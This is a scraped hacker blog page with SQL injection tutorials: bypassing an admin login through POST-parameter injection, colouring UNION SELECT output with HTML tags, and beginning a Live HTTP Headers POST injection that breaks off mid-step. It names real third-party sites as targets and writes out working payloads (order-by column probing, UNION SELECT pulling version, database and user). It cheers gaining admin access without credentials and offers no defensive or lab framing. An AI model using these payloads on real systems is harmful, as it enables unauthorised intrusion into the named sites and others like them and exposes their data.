<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB3gnNmWHS2WmQ6QUU2rHhB_0K81eCtkdC2jDP4SYq9lUlok_KI5m7KOFWdc2Geu3s7c_FUS5_C9zhPe4z6c5fdeirp0qz8lbBpFw_AnnDUUxMrq5zHrYIWOob5FoiaYHuNznYq-V9lHD0/s1600/Bypassing+Login+Panel+with+SQL+Queries+www.raijee1337.blogspot.com+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB3gnNmWHS2WmQ6QUU2rHhB_0K81eCtkdC2jDP4SYq9lUlok_KI5m7KOFWdc2Geu3s7c_FUS5_C9zhPe4z6c5fdeirp0qz8lbBpFw_AnnDUUxMrq5zHrYIWOob5FoiaYHuNznYq-V9lHD0/s320/Bypassing+Login+Panel+with+SQL+Queries+www.raijee1337.blogspot.com+3.png" title="Bypassing Login Panel with SQL Queries" width="320" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Login Panel with SQL Queries Tutorial By RAi Jee</b></span><br />
<span style="font-size: small;">In This Tutorial you Will Learn How to Bypass Login Panel with SQL Injection Queries.</span><br />
<span style="font-size: small;">So Actually we give our SQL evil Queries in Admin Panel And Then The Server Filter Our Command and give us Access To the Admin Panel without using any username or Password.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Before start Injecting in Admin Panel we need Hackbar or Live HTTP Headers Addon installed in Browser.</span><br />
<span style="font-size: small;">We will Give our SQL Queries to the Server with POST Method so we need these Addons for Execution our POST Parameters Injection.</span><br />
<span style="font-size: small;">i've put a Site for our This tutorial.</span><br />
<span style="font-size: small;">Here is the Target site</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://trentglobal.com/admin</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We can use Live HTTP Headers or Hackbar for Post Parameters Injection so i will Use Hackbar For this Process.</span><br />
<span style="font-size: small;">Now Lets Insert Some Text in username and password boxes.After Inserting Text Click on LOGIN Button.Then Enable Post Data in Hackbar for the Execution of Our Post Parameters.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH9M1W0aDq7LwGEZR9zFeq52HUl5w6B2JZZd8aVDbux68l8fJIVw2oZ0T0Rk6xKVZRUVtUH1w9Isupx56Nhkpe-cS9uGdo6Py6qXJv-g6LmlUGCnL2ixGBM-sr7p3EjpWE0mdbSDfHP9Gk/s1600/Bypassing+Login+Panel+with+SQL+Queries+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH9M1W0aDq7LwGEZR9zFeq52HUl5w6B2JZZd8aVDbux68l8fJIVw2oZ0T0Rk6xKVZRUVtUH1w9Isupx56Nhkpe-cS9uGdo6Py6qXJv-g6LmlUGCnL2ixGBM-sr7p3EjpWE0mdbSDfHP9Gk/s400/Bypassing+Login+Panel+with+SQL+Queries+1.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">Now Click on LOAD URL Button in Hackbar to get POST Parameters in POST DATA box in Hackbar Addon.There we will give our SQL injection Queries.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzbldJJfj2vz95g08vARVnfvgkFwLwHZnPln74PBDL6agEEZoO9pg9ppUzy8SY4o5__k8MS2fmZk9hhU9So4IAedlAKkygOoetUwuOWnDAR9OoqNSnxx_wMlj-HsZWAK-qaDMIbNcJApT/s1600/Bypassing+Login+Panel+with+SQL+Queries+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzbldJJfj2vz95g08vARVnfvgkFwLwHZnPln74PBDL6agEEZoO9pg9ppUzy8SY4o5__k8MS2fmZk9hhU9So4IAedlAKkygOoetUwuOWnDAR9OoqNSnxx_wMlj-HsZWAK-qaDMIbNcJApT/s400/Bypassing+Login+Panel+with+SQL+Queries+2.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">It gives us Invalid Username and Password but you can See the Post Data in Hackbar Addon.</span><br />
<span style="font-size: small;">Here is Our Post Parameter <b>uname=raijee&pwd=123456&log_submit=Login</b></span><br />
<span style="font-size: small;">let's Add Single Quote after <b>uname=raijee'</b> to check The SQLi vulnerability.And Then Execute the Query.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiObCNea8E1lZoT5Ww4lwUCq1wL-32uclPW3f4iRf96wYTKGimWa9l7b48OcZI_nC5XZToVrvfazZHzgWHJZwRj5-1gBgoli_hxlBUh4v5l3Pcacz-68lPBA-hX_hOcbFQEHc0-iwKHz-c7/s1600/Bypassing+Login+Panel+with+SQL+Queries+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiObCNea8E1lZoT5Ww4lwUCq1wL-32uclPW3f4iRf96wYTKGimWa9l7b48OcZI_nC5XZToVrvfazZHzgWHJZwRj5-1gBgoli_hxlBUh4v5l3Pcacz-68lPBA-hX_hOcbFQEHc0-iwKHz-c7/s400/Bypassing+Login+Panel+with+SQL+Queries+3.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">It is Vulnerable to SQL Injection.Next we will execute STRING Based SQL Query for Further Injecting.</span><br />
<!-- adsense -->
<span style="font-size: small;">Now Let's Count how Many Columns are there.</span><br />
<span style="font-size: small;">So We will Give our Command For counting Columns in Post Parameters with Hackbar.</span><br />
<span style="font-size: small;"><b>uname=raijee' order by 2%23</b></span><br />
<span style="font-size: small;"><b>No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>uname=raijee' order by 3%23</b></span><br />
<span style="font-size: small;"><b>No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>uname=raijee' order by 4%23</b></span><br />
<span style="font-size: small;"><b>No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>uname=raijee' order by 5%23</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCcMNHKFSv1E7qWQyCJHj1IYfRxgTTlYa-YZdYqIUcwSNvQTUj7MeJ3lZYodVJijHEIWFD2H98pFRcOWsALfz5oFjUEOlXG-mBnwFNbeUcV8BjJAUUNiTekI4FcnMD0kscp9dG5TXyBiUv/s1600/Bypassing+Login+Panel+with+SQL+Queries+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCcMNHKFSv1E7qWQyCJHj1IYfRxgTTlYa-YZdYqIUcwSNvQTUj7MeJ3lZYodVJijHEIWFD2H98pFRcOWsALfz5oFjUEOlXG-mBnwFNbeUcV8BjJAUUNiTekI4FcnMD0kscp9dG5TXyBiUv/s400/Bypassing+Login+Panel+with+SQL+Queries+4.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>We Got Error !! Unknown column '5' in 'order clause'</b></span><br />
<span style="font-size: small;">it Means There are <b>4</b> Total<b> </b>number of Columns.</span><br />
<span style="font-size: small;">Hmmm Now Let's Execute our UNION SELECT command with 4 number of Columns.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMEniitzKdSpBfw7S3RBvXy0zVS23CFQsFnFpjwyDfIaNLB_o5WsXLV0h6-uJfXPgY9DjsXlhVpmuwJAmVgtLlFWnpa8_LYLZtSmlKeywh7GZNWlWluaCldIWVKGlqH51WEvvX-xWenqc/s1600/Bypassing+Login+Panel+with+SQL+Queries+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMEniitzKdSpBfw7S3RBvXy0zVS23CFQsFnFpjwyDfIaNLB_o5WsXLV0h6-uJfXPgY9DjsXlhVpmuwJAmVgtLlFWnpa8_LYLZtSmlKeywh7GZNWlWluaCldIWVKGlqH51WEvvX-xWenqc/s400/Bypassing+Login+Panel+with+SQL+Queries+5.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">BinGOOOO!! Admin Panel Bypassed .we have got Access to the Admin Panel Without using Username or Password of the Admin user.</span><br />
<span style="font-size: small;"><br /></span>
<span style="color: #351c75; font-size: small;">HA</span><span style="color: #e06666; font-size: small;">ppY</span><span style="font-size: small;"> <span style="color: magenta;">Hack</span><span style="color: #fce5cd;">ing</span> <span style="color: cyan;">!!</span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-45024325600971535872015-07-11T08:27:00.000-07:002015-08-17T08:44:43.343-07:00Adding HTML Tags in SQL Queries<div style="text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnTEDbMivs7AZsvxDWj-HjErUGpWf29WmEjBBRQmo4o4ckvnppeY1GN1Ueg8UHQ1nmKn_Ep4heiEDShbDngJydv_dGe4fQDEoqhuiDYLBSZG8pX0TmlhoymUSJRDxyPqfOatIvQW6HqIRH/s1600/Adding+HTML+Tags+in+SQL+Queries+tutorial+www.raijee1337.blogspot.com+By+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Adding HTML Tags in SQL Queries" border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnTEDbMivs7AZsvxDWj-HjErUGpWf29WmEjBBRQmo4o4ckvnppeY1GN1Ueg8UHQ1nmKn_Ep4heiEDShbDngJydv_dGe4fQDEoqhuiDYLBSZG8pX0TmlhoymUSJRDxyPqfOatIvQW6HqIRH/s320/Adding+HTML+Tags+in+SQL+Queries+tutorial+www.raijee1337.blogspot.com+By+RAi+Jee.png" title="Adding HTML Tags in SQL Queries" width="320" /></a></span></div>
<span style="font-size: small;"><b>Adding HTML Tags in SQL Queries - Tutorial by RAi Jee</b></span><br />
<span style="font-size: small;">HTML Tags can be used For a lot of Fun in SQL Queries . We Can use HTML Tags to Make Color full Result in Output.Sometimes we are injecting A site and The Vulnerable Columns is in Title or in Source Page so we Can also Use HTML Tags There to Show Output on The Page.</span><br />
<span style="font-size: small;">So We Will Start Adding HTML Tags For making Output Some Color Full.</span><br />
<span style="font-size: small;">Here is a example. We wanna Print The version in RED Color So Here is our HTML TAG for Showing the Version in RED Color .<span style="color: red;"> </span></span><br />
<span style="color: red; font-size: small;"> <span style="font-weight: bold;"><font color=red></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Concat(<span style="color: red;">OUR_HTML_TAG</span>,<span style="color: lime;">QUERY_HERE</span>)</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">lets See the Result.Before Executing The Query First Encode HTML TAG in Hex Value or Use Single Quote Before and After The HTML Tag To Make it Executable</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: black;">http://www.kimclement.com/basiccal/event.php<br />?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+</span></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUlamuizHOac2pAvthn6TXCuPghO5q2Hp0Eb5SkDfhS_m9djK1ocYfNw7JN3o0_z8I6sK4U0H2R1cl6rxf-wY19lp_dlJDDoPWdbqwl5sT8BbB-eG2R3M5HeFu7z0JtZX3z6IhnEODX4Z/s1600/adding+html+tags+in+sql+queries+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Adding HTML Tags in SQL Queries" border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUlamuizHOac2pAvthn6TXCuPghO5q2Hp0Eb5SkDfhS_m9djK1ocYfNw7JN3o0_z8I6sK4U0H2R1cl6rxf-wY19lp_dlJDDoPWdbqwl5sT8BbB-eG2R3M5HeFu7z0JtZX3z6IhnEODX4Z/s400/adding+html+tags+in+sql+queries+1.png" title="Adding HTML Tags in SQL Queries" width="400" /></a></span></div>
<span style="color: limegreen; font-size: small;"><span style="color: black;">And You can See the Version is in RED color. if we Wanna use Diffirent Colors for Each Command Like Displaying <span style="color: red;">Version in RED </span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: red;">Color</span> ,<span style="color: lime;">Database in Green Color</span>,<span style="color: blue;">User in Blue Color </span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;">so will use Different HTML Tags for each Tasks.</span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">See Example .</span></span></span></span><br />
<!-- adsense -->
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">Concat(</span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: red;"><span style="color: limegreen;"><span style="color: black;"><span style="color: red;">Version RED </span></span></span><span style="font-weight: bold;"><span style="color: limegreen;"><span style="color: red;">Color</span> ,<span style="color: lime;">Database in Green Color</span>,<span style="color: blue;">User in Blue Color</span></span></span></span>)</span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">HTML Tags For Each Task:</span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">Red color: <span style="color: red;"><font color=red></span></span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">Green Color: <span style="color: lime;"><font color=green></span></span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">Blue Color: <span style="color: blue;"><font color=blue></span></span></span></span></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">So Our Final Query For Displaying Each task in Different<b> </b></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;">color Will be,</span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;">Concat(</span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: red;"><font color=red>,</span></span></span></span>version()<span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: red;">,</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: lime;"><font color=green>,<span style="color: black;">database()</span>,</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><font color=blue>,<span style="color: black;">user())</span></span></span></span></span></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">See Example.</span></span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">http://www.kimclement.com/basiccal/event.php<br />?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+</span></span></span></span></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6M7zcJePqdLzsguYesCJ4kiKNaIYOqMnXxkYra6IU687R8IuBIdNUv43SXn98S1YVR44_irhNNipljVONENBbIRYhFAVnCrNmiLvgBsdEbE1vNDYIS3e5nT_sXy80TvDYXLM01CkI-fI/s1600/adding+html+tags+in+sql+queries+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Adding HTML Tags in SQL Queries" border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6M7zcJePqdLzsguYesCJ4kiKNaIYOqMnXxkYra6IU687R8IuBIdNUv43SXn98S1YVR44_irhNNipljVONENBbIRYhFAVnCrNmiLvgBsdEbE1vNDYIS3e5nT_sXy80TvDYXLM01CkI-fI/s400/adding+html+tags+in+sql+queries+2.png" title="Adding HTML Tags in SQL Queries" width="400" /></a></span></div>
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">And See the picture</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> </span></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">all Tasks Are complete .In this way You Can Also Display Tables and Columns in different Colors.</span></span></span></span></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">After<b> </b></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">Displaying SQLi Commands in Different Colors</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> .</span></span></span></span></span></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">Now Let's See how Can We Display Data When our Vulnerable Column is in</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> Source Page </span></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">or in</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> TiTLE Using HTML TAGS.</span></span></span></span></span></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">When Vulnerable Column is in Source Page.</span></span></span></span></span><br />
<span style="font-size: small;"><b>Concat(<span style="color: red;">STARTING_HTML_TAG</span>,OUR_QUERY,<span style="color: red;">ENDING_HTML_TAG</span>)</b></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">so we will use this <b>HTML TAG</b> for Displaying Data on the Page if Our Vulnerable Columns is in Source page.</span></span></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) </span></span></span></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">and sometimes our Vulnerable Column is in Title so in that case we will use this <b>HTML Tag</b> to Print Data on the Webpage</span></span></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">HTML TAG:Concat(</title>,Version())</span></span></span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"><br /></span></span></span></span></span></span>
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">use these</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> HTML Tags </span></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">after encoding in </span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">Hex Value </span></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">or </span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">PUT </span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">Single Quote </span></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">before and after the</span></span></span></span></span><span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> HTML Tag</span></span></span></span></span></span><span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"> to make the Query Executable.</span></span></span></span></span><br />
<span style="color: limegreen; font-size: small;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;"><span style="color: red;">Happy</span> <span style="color: magenta;">Injecting</span> <span style="color: #a64d79;">!!</span></span></span></span></span></span><br />
<span style="font-size: small; font-weight: bold;"><span style="color: limegreen;"><span style="color: blue;"><span style="color: black;"><span style="color: blue;"><span style="color: black;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</span></span></span></span></span></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com0tag:blogger.com,1999:blog-5545325473666478334.post-79078785080490284122015-07-10T00:24:00.002-07:002015-08-17T08:42:45.411-07:00Post Parameters Injection Through Live HTTP Headers<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9xvg8b0GkHbI82qXjPK_VE4ku1Ds_VmlJo7UI8cDVaM7LJYmyf3SB0plQrQrnzekBduOxiD5WKcoo63N83p7Yc-gWhspYLbG1opveddsGlnQ8z84MamaYCLM27lm6dOrbJt7CbA-Rt0b9/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9xvg8b0GkHbI82qXjPK_VE4ku1Ds_VmlJo7UI8cDVaM7LJYmyf3SB0plQrQrnzekBduOxiD5WKcoo63N83p7Yc-gWhspYLbG1opveddsGlnQ8z84MamaYCLM27lm6dOrbJt7CbA-Rt0b9/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers+tutorial.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span><br />
<span style="font-size: small;"><b> Post Parameters Injection Through Live HTTP Headers - Tutorial By RAi Jee</b></span><br />
<span style="font-size: small;">In This Tutorial You Will Learn How to Inject a Website Through Post Parameters with Live HTTP Headers.</span><br />
<span style="font-size: small;">First You Need Live HTTP Headers Addon installed in Your Browser if Dont have This Addon Than You Can Installed it From This Link.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><a href="https://addons.mozilla.org/en-us/firefox/addon/live-http-headers/" target="_blank">Live HTTP Headers</a></span><br />
<span style="font-size: small;">Now Lets Start our Tutorial</span><br />
<span style="font-size: small;">Here is The our Target Site There You Can See A Search Box.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OQDRLFKBLnFv4xlGpalaS0qdfQ8fDO8jS7q1QgE05BdvNplkbLuBoJ6-2S9Cnb0gK59I_toO7odaSUAxVp1N900PLnDmJZ6WRdtTc2BiC1epJmtL8t1vIKRGquyzPkh5Y6U4RCcxu6WT/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers+1.+www.raijee1337.blogspot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OQDRLFKBLnFv4xlGpalaS0qdfQ8fDO8jS7q1QgE05BdvNplkbLuBoJ6-2S9Cnb0gK59I_toO7odaSUAxVp1N900PLnDmJZ6WRdtTc2BiC1epJmtL8t1vIKRGquyzPkh5Y6U4RCcxu6WT/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers+1.+www.raijee1337.blogspot.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">Now input Some Text in that Search Box and Open Live HTTP Headers Addon.Then Click on The Search Button to execute the Search command.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPZOrXu_6JnC0U-pO7PvnQM1r3k_4uuwAjBAH4sDgvsqfOHVkoJDM7G_9uObBQaaYNnlgMMvdrAuS84aQEdNe9OBeavIikGUmSEqMev2Jh0T-9d0RS3VOh9Xgz25GBjYBUAVk-KsdPotSz/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers+2.+www.raijee1337.blogspot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPZOrXu_6JnC0U-pO7PvnQM1r3k_4uuwAjBAH4sDgvsqfOHVkoJDM7G_9uObBQaaYNnlgMMvdrAuS84aQEdNe9OBeavIikGUmSEqMev2Jh0T-9d0RS3VOh9Xgz25GBjYBUAVk-KsdPotSz/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers+2.+www.raijee1337.blogspot.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">After Click on the Search BUTTON now see in the Live HTTP Headers to Find our Post Parameter which We Have input There.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo-x4-ihVSnR1uPo8XVZpl4BwFBMLDyxz5jW6WcOmKSmnMhKMdl19WV48fcHieDX0pJOEXefkIhlwMMRDAuK7Akf994VOWOq7Ghlw6tPsCIYs-VfmAaYyTyaDAIiP-NYkII1QG1ALQ4ZYg/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo-x4-ihVSnR1uPo8XVZpl4BwFBMLDyxz5jW6WcOmKSmnMhKMdl19WV48fcHieDX0pJOEXefkIhlwMMRDAuK7Akf994VOWOq7Ghlw6tPsCIYs-VfmAaYyTyaDAIiP-NYkII1QG1ALQ4ZYg/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+5.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-wR2ipCDhM7FsMYF1jwbjpOfDCuhEtiwNt2pohED3hXcLoQy9G0R42WqOx8AlXwKTsNQPNc_J_W7sB52eFkBBiCp7u-ygjs5g1gR0oS27qYrm_35fWNiDz5JfFoGDXJFcHfTaDGKJoDDx/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></span></div>
<span style="font-size: small;">And Our Post Parameter is <b>inputsbox=raijee&x=11&y=9</b>. Lets Add Single Quote at end of <b>inputsbox=raijee'</b> to check if its Vulnerable or not.Click on REPLY Option in Live HTTP Headers to execute our Post Parameters Commands.</span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
